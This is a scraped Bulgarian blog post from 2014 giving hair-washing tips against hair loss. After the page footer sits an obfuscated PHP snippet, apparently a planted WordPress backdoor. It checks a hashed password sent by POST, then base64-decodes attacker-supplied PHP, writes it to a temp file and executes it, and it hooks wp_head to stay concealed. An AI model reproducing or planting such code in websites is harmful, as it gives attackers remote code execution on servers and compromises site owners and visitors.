Съвети срещу косопад от Биг Брадър | Косопад

Правилно ли миете косата си?

Грешките в хигиената могат да предизвикат косопад

косопад и хигиена

Миенето на косата не трябва да се възприема като някаква обикновена процедура, а като нещо много специално и изискващо особено внимание. И ако объркате нещата, може да си предизвикате сами сериозни проблеми, като например косопад. Изцяло от вас зависи да намерите подходящите за себе си продукти и да се отнасяте нежно, защото в противен случай никога няма да имате прическата за която мечтаете.

Как да огранича вредата за косата си и да я направя красива, лъскава, еластична и свежа? Просто прочетете следващите полезни съвети, които при всички положения ще ви бъдат от полза.

Използвайте натурални почистващи продукти за коса. Правилните шампоан и балсам ще ви помогнат да извървите дългия път за насърчаване растежа на косъма. Не допускайте грешката да миете главата със същия сапун, който използвате за тялото. Той е твърде „тежък” за нежните космени фоликули, изтощава ги, предизвиква изсушаване на космите, а това от своя страна води до косопад.

Уверете се, че косата ви наистина е добре намокрена, преди да нанесете препарат. Това ще помогне на шампоана и балсама да проникнат по – добре и да почистят всичко из основи.

Докато миете масажирайте нежно скалпа, използвайки връхчетата на пръстите, а не ноктите. Масажът сам по себе си е прекрасна превантивна мярка срещу косопад, тъй като засилва притока на кръв и това позволява снабдяването с повече хранителни вещества.

Когато се подсушавате, използвайте мека, абсорбираща кърпа. В никакъв случай не трийте със зверство, тъй като това ще повреди косата ви. Помнете, че тя е особено уязвима докато е мокра и лесно се къса.

Веднъж завинаги забравете какво значи сешоар. Този електрически уред оказва силно зловредно влияние, което дехидратира и изтощава космите.

06. януари 2014 21:22:08 от Косопад
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}